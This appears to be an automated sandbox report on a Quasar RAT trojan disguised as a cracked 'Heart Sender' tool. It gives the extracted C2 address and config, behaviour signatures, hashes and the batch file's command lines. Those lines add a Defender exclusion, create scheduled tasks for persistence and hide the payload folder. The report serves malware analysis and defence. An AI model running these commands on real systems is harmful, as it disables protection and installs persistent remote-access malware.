quasar | d89a2246c6db2ec558bce3f1b3ca0cf32eb7dd9905b1ff30f802732434254c93

Analysis

max time kernel
148s
max time network
148s
platform
windows7_x64
resource
win7v20201028
submitted
09-03-2021 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Config.bat

Score

10^/10

quasar heart spyware trojan upx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Heart

185.163.127.20:61110

Mutex

HRT_MUTEX_kecTsVDPnERdvianlr

Attributes

encryption_key
3vnM9JqtaSdxUVqeTXSi
install_name
Subfile.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDirr

Signatures

Quasar Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe	family_quasar
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

ACProtect 1.3x - 1.4x DLL software 3 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
\Program Files\Common Files\System\symsrv.dll	acprotect
C:\Program Files\Common Files\System\symsrv.dll	acprotect
\Program Files\Common Files\System\symsrv.dll	acprotect

Executes dropped EXE 2 IoCs

Processes:

Sys32.exeSubfile.exe

pid process

760 Sys32.exe
1504 Subfile.exe

pid	process
760	Sys32.exe
1504	Subfile.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Program Files\Common Files\System\symsrv.dll	upx
C:\Program Files\Common Files\System\symsrv.dll	upx
C:\Users\Admin\AppData\Local\Temp\A1D26E2\7B484A06D8.tmp	upx
\Program Files\Common Files\System\symsrv.dll	upx

Loads dropped DLL 2 IoCs

Processes:

Loader.exeLoader1.exe

pid process

1752 Loader.exe
1704 Loader1.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com
Drops file in Program Files directory 1 IoCs

Processes:

Loader.exe

description ioc process

File created C:\Program Files\Common Files\System\symsrv.dll Loader.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

296 schtasks.exe
1144 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Sys32.exe

pid process

760 Sys32.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

Loader.exeLoader1.exe

pid process

1752 Loader.exe
1704 Loader1.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1180 powershell.exe
1180 powershell.exe
1740 powershell.exe
1740 powershell.exe

pid	process
1752	Loader.exe
1704	Loader1.exe

flow	ioc
3	ip-api.com

description	ioc	process
File created	C:\Program Files\Common Files\System\symsrv.dll	Loader.exe

pid	process
296	schtasks.exe
1144	schtasks.exe

pid	process
760	Sys32.exe

pid	process
1752	Loader.exe
1704	Loader1.exe

pid	process
1180	powershell.exe
1180	powershell.exe
1740	powershell.exe
1740	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exeLoader.exeLoader1.exeSubfile.exe

description	pid	process
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	1752	Loader.exe
Token: SeDebugPrivilege	1704	Loader1.exe
Token: SeDebugPrivilege	1504	Subfile.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Subfile.exe

pid process

1504 Subfile.exe

pid	process
1504	Subfile.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

cmd.exetaskeng.exe

description	pid	process	target process
PID 1656 wrote to memory of 1180	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 1180	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 1180	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 1740	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 1740	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 1740	1656	cmd.exe	powershell.exe
PID 1656 wrote to memory of 296	1656	cmd.exe	schtasks.exe
PID 1656 wrote to memory of 296	1656	cmd.exe	schtasks.exe
PID 1656 wrote to memory of 296	1656	cmd.exe	schtasks.exe
PID 1656 wrote to memory of 1144	1656	cmd.exe	schtasks.exe
PID 1656 wrote to memory of 1144	1656	cmd.exe	schtasks.exe
PID 1656 wrote to memory of 1144	1656	cmd.exe	schtasks.exe
PID 1656 wrote to memory of 1116	1656	cmd.exe	attrib.exe
PID 1656 wrote to memory of 1116	1656	cmd.exe	attrib.exe
PID 1656 wrote to memory of 1116	1656	cmd.exe	attrib.exe
PID 1656 wrote to memory of 1752	1656	cmd.exe	Loader.exe
PID 1656 wrote to memory of 1752	1656	cmd.exe	Loader.exe
PID 1656 wrote to memory of 1752	1656	cmd.exe	Loader.exe
PID 1656 wrote to memory of 1752	1656	cmd.exe	Loader.exe
PID 1656 wrote to memory of 1752	1656	cmd.exe	Loader.exe
PID 1656 wrote to memory of 1752	1656	cmd.exe	Loader.exe
PID 1656 wrote to memory of 1752	1656	cmd.exe	Loader.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	Loader1.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	Loader1.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	Loader1.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	Loader1.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	Loader1.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	Loader1.exe
PID 1656 wrote to memory of 1704	1656	cmd.exe	Loader1.exe
PID 528 wrote to memory of 760	528	taskeng.exe	Sys32.exe
PID 528 wrote to memory of 760	528	taskeng.exe	Sys32.exe
PID 528 wrote to memory of 760	528	taskeng.exe	Sys32.exe
PID 528 wrote to memory of 1504	528	taskeng.exe	Subfile.exe
PID 528 wrote to memory of 1504	528	taskeng.exe	Subfile.exe
PID 528 wrote to memory of 1504	528	taskeng.exe	Subfile.exe
PID 528 wrote to memory of 1504	528	taskeng.exe	Subfile.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1116 attrib.exe

pid	process
1116	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Config.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile0" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe" /RL HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:296

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile1" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe" /RL HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:1144

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Roaming\SubDirr
2⤵
- Views/modifies file attributes
PID:1116

C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader.exe
loader.exe -pP@$$W@RD@@
2⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader1.exe
loader1.exe -pP@$$W@RD@@
2⤵
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\taskeng.exe
taskeng.exe {9D685995-0A55-4FAC-A5FF-993ECDFDEDFA} S-1-5-21-293278959-2699126792-324916226-1000:TUICJFPF\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:528

C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:760

C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1504

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\System\symsrv.dll
MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1edd574d-9e49-4d9a-bdfc-8a95a3c1e53e
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e4e1b4d-8adf-473b-881b-b19a9bfb379b
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6a48fbef-3c0b-4020-9294-3c5e0a594063
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_72c96d48-96f2-483a-8c88-e27307cc643f
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_78ab6aaf-1fe5-4667-9edc-cdafcb7bd27f
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8543a549-cdfb-4fca-b0c4-3319dcc5f534
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a7c8de12-6b5f-4f57-be6b-2349c05f27cb
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
f0b80483d31ac747f8665b57793f60c2

SHA1
ce3dd07b6f9d271f89f7f4a506ebef8ff086957e

SHA256
10d3fde716a210aea888ece2ce1ac0a3d99bbf98e256ade403c5d28f2da1bbc0

SHA512
de21ebe41110c63b81ce8416d2cd62f80533010621c07d1d1f5bb4290a19202b0b8d473f1d90e00784bab7bbeb969eea9c279ae43d19649d36a15a9d1a2ca9c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\A1D26E2\7B484A06D8.tmp
MD5
a0f5d9448eed029fef6d9944df015832

SHA1
560dc39fbdccf26465005baf60648d3e0e41b32a

SHA256
02d46c7d93d8be4e82fd29d9452203f86d75476dbfcc952efa63360a260fb242

SHA512
c41251267d6c42aa916df9e15304e839b0cb9087c834c9aa2a3b912b91c67ba1804e0a1854c64b14654d9ead03e1ed0e4a4ca3a4fd87616f7ad47c8edcec12d7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
490e0b8ae37d7e2ed16c47d33f8479ec

SHA1
37aa4716c5e19348186471b526fadc97c38fec58

SHA256
899663718a295d8cef076bb8c0c52f9f53c1b54591cdd99fb45e1fb59e3cd959

SHA512
8e970ab568af254f412814ca8b64a4fde77ac1c53decfe0ace58b4bb0d85fb04b847a46803f84efd7bd0e878c69c608ea151916209f9b6320d206aa6fbe8a664

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
MD5
3e5da207d7655d267515b8fd7fe35b8a

SHA1
85a81b28b919d283c7ae1df1a6c8c45dc0ff756a

SHA256
db4b1a7399ad2e1fc3d8e64cb9e870a4b7f36ef629614517942a4b7318c29f42

SHA512
f097cfdaa714fe1dfcb360467010597015ba1ff4ca686d340d1775bdeadbe02d4d9ec064d78e20add0c29bd4f06f8ef9ee572f2374031a6313af2f7602c0530d

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe
MD5
3e5da207d7655d267515b8fd7fe35b8a

SHA1
85a81b28b919d283c7ae1df1a6c8c45dc0ff756a

SHA256
db4b1a7399ad2e1fc3d8e64cb9e870a4b7f36ef629614517942a4b7318c29f42

SHA512
f097cfdaa714fe1dfcb360467010597015ba1ff4ca686d340d1775bdeadbe02d4d9ec064d78e20add0c29bd4f06f8ef9ee572f2374031a6313af2f7602c0530d

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
MD5
4fb7326fe1263d2f0626ee186195b891

SHA1
f2ceda16fe3ba9e90e2b17f77879278923fb3fe9

SHA256
d4641707fb9daa4f2e4e30f869a968f022f98c1067a9d8a9bd21ab22e56f82f4

SHA512
f4191396b94e1517af938a9ca6068686956e99b2bde98ed6dccc14c05ecf016c11a75010c5e911a52524886e9404cb001d68832230b15d455fab514ddd9fce7a

Download Submit
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe
MD5
4fb7326fe1263d2f0626ee186195b891

SHA1
f2ceda16fe3ba9e90e2b17f77879278923fb3fe9

SHA256
d4641707fb9daa4f2e4e30f869a968f022f98c1067a9d8a9bd21ab22e56f82f4

SHA512
f4191396b94e1517af938a9ca6068686956e99b2bde98ed6dccc14c05ecf016c11a75010c5e911a52524886e9404cb001d68832230b15d455fab514ddd9fce7a

Download Submit
\Program Files\Common Files\System\symsrv.dll
MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
\Program Files\Common Files\System\symsrv.dll
MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
memory/296-46-0x0000000000000000-mapping.dmp

Download
memory/760-70-0x000000001B8B0000-0x000000001B8B2000-memory.dmp

Filesize
8KB

Download
memory/760-64-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/760-61-0x000007FEF50E0000-0x000007FEF5ACC000-memory.dmp

Filesize
9.9MB

Download
memory/760-57-0x0000000000000000-mapping.dmp

Download
memory/1116-48-0x0000000000000000-mapping.dmp

Download
memory/1144-47-0x0000000000000000-mapping.dmp

Download
memory/1180-6-0x000000001AE30000-0x000000001AE31000-memory.dmp

Filesize
4KB

Download
memory/1180-4-0x000007FEF5040000-0x000007FEF5A2C000-memory.dmp

Filesize
9.9MB

Download
memory/1180-26-0x00000000027B0000-0x00000000027B1000-memory.dmp

Filesize
4KB

Download
memory/1180-14-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/1180-11-0x00000000026A0000-0x00000000026A1000-memory.dmp

Filesize
4KB

Download
memory/1180-10-0x0000000002060000-0x0000000002061000-memory.dmp

Filesize
4KB

Download
memory/1180-3-0x000007FEFB631000-0x000007FEFB633000-memory.dmp

Filesize
8KB

Download
memory/1180-27-0x00000000027C0000-0x00000000027C1000-memory.dmp

Filesize
4KB

Download
memory/1180-5-0x0000000001F10000-0x0000000001F11000-memory.dmp

Filesize
4KB

Download
memory/1180-2-0x0000000000000000-mapping.dmp

Download
memory/1180-7-0x000000001ADB0000-0x000000001ADB2000-memory.dmp

Filesize
8KB

Download
memory/1180-9-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/1180-8-0x000000001ADB4000-0x000000001ADB6000-memory.dmp

Filesize
8KB

Download
memory/1504-69-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

Filesize
4KB

Download
memory/1504-67-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/1504-66-0x0000000074000000-0x00000000746EE000-memory.dmp

Filesize
6.9MB

Download
memory/1504-62-0x0000000000000000-mapping.dmp

Download
memory/1704-52-0x0000000000000000-mapping.dmp

Download
memory/1740-31-0x000007FEF5070000-0x000007FEF5A5C000-memory.dmp

Filesize
9.9MB

Download
memory/1740-32-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/1740-33-0x000000001AEB0000-0x000000001AEB1000-memory.dmp

Filesize
4KB

Download
memory/1740-36-0x00000000025B0000-0x00000000025B1000-memory.dmp

Filesize
4KB

Download
memory/1740-28-0x0000000000000000-mapping.dmp

Download
memory/1740-35-0x000000001AE34000-0x000000001AE36000-memory.dmp

Filesize
8KB

Download
memory/1740-37-0x00000000023A0000-0x00000000023A1000-memory.dmp

Filesize
4KB

Download
memory/1740-34-0x000000001AE30000-0x000000001AE32000-memory.dmp

Filesize
8KB

Download
memory/1752-49-0x0000000000000000-mapping.dmp

Download
memory/1752-50-0x0000000074D11000-0x0000000074D13000-memory.dmp

Filesize
8KB

Download